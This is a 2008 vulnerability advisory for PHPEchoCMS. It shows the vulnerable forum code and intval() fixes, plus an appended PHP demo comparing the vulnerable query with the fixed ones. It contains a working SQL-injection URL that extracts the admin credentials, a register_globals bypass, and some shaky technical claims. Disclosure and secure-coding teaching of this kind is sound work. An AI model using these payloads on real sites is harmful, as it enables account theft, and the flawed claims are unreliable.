Computer Security
[EN] securityvulns.ru
From: HACKERS PAL <security_(at)_soqor.net>
Date: 17.01.2008
Subject: PHPEchoCMS Multiple remote vulnerabilities

Hello,

PHPEchoCMS Multiple remote vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


first thing ..
full path
kernel/init.php
modules/admin/index.php
..
every file to be included has to have the value of the variable $BASE_LOAD
but if register_globals is on then you can set it in the browser like this ..
modules/files/index.php?BASE_LOAD=1

it will continue .. and other files too

modules/forum/index.php
lines [31-49]
   if (@$_POST['post']=='thread')
   {
       if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
       {
           // Add the thread to the specified section
           // $_POST['id'] only goes through addslashes(), which escapes quotes
           // and backslashes but does nothing for a value used unquoted in SQL
           $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1', '"
                . addslashes($_POST['title'])."', '"
                . str_replace("\n", "<br>", addslashes($_POST['contents']))."', '"
                . $_SESSION['username']."','".date("d-m-Y H:i")."', '0')";
           $res = query($ins, 1);
           // here `id` is not quoted, so the addslashes() call gives no protection
           $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);
           $res = query($ins, 1);
           $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
           redirect ("index.php?module=forum&show=thread&id=".$nb);
       }
       else
       {
           $content = $mlang['017'];
       }
   }

see
           $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE `id`=".addslashes($_POST['id']);

could be modified to an update query by posting value of id as next
id=union update members set password=[value] where id=1

of course the value here should be an md5 hash .. and no brackets, so the query will be ok :)


lines [138-142]

   elseif (@$_GET['show']=='thread' && $_GET['id'])
   {
       // Show a thread and its replies (child-threads)
       $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4);

replace with

   elseif (@$_GET['show']=='thread' && $_GET['id'])
   {
       // Show a thread and its replies (child-threads)
       $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4);


exploit
index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*



# WwW.SoQoR.NeT
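As an added example (not from the advisory or from PHPEchoCMS), the same defect in a self-contained PHP script: the unquoted addslashes() query beside the intval() fix the advisory proposes and a PDO prepared statement, run against an in-memory SQLite database whose table names, rows and input are constructed here. It assumes the pdo_sqlite extension is loaded.

```php
<?php
// Added example: why addslashes() does not protect an unquoted integer in SQL,
// and two ways to fix it. Tables and rows below are constructed for the demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE threads (id INTEGER, section INTEGER, title TEXT)");
$db->exec("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)");
$db->exec("INSERT INTO threads VALUES (1, 1, 'Welcome')");
$db->exec("INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value')");

// Vulnerable pattern from the advisory: addslashes() only escapes quotes and
// backslashes; since the value is not quoted in the SQL, other syntax survives.
function thread_query_vulnerable(string $id): string {
    return "SELECT * FROM threads WHERE id=" . addslashes($id);
}

// Fix shown in the advisory: intval() reduces the input to a single integer.
function thread_query_intval(string $id): string {
    return "SELECT * FROM threads WHERE id='" . intval($id) . "'";
}

// Preferred fix: a prepared statement keeps the value out of the SQL text.
function thread_rows_prepared(PDO $db, string $id): array {
    $stmt = $db->prepare("SELECT * FROM threads WHERE id = :id");
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input of the shape the advisory describes (no quotes needed,
// so addslashes() leaves it unchanged).
$input = "-1 UNION SELECT id, username, password FROM users";

// Vulnerable: the UNION row returns users.username/password under threads' columns.
print_r($db->query(thread_query_vulnerable($input))->fetchAll(PDO::FETCH_ASSOC));

// intval("-1 UNION ...") === -1: no thread has that id, so nothing is returned.
print_r($db->query(thread_query_intval($input))->fetchAll(PDO::FETCH_ASSOC));

// Prepared statement: same empty result, and the input is never parsed as SQL.
print_r(thread_rows_prepared($db, $input));
```

Detection-wise, the intval() and prepared-statement versions also stop the user-controlled text from reaching the database log at all, which is the condition a WAF or query-log rule for UNION in a numeric parameter is looking for.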
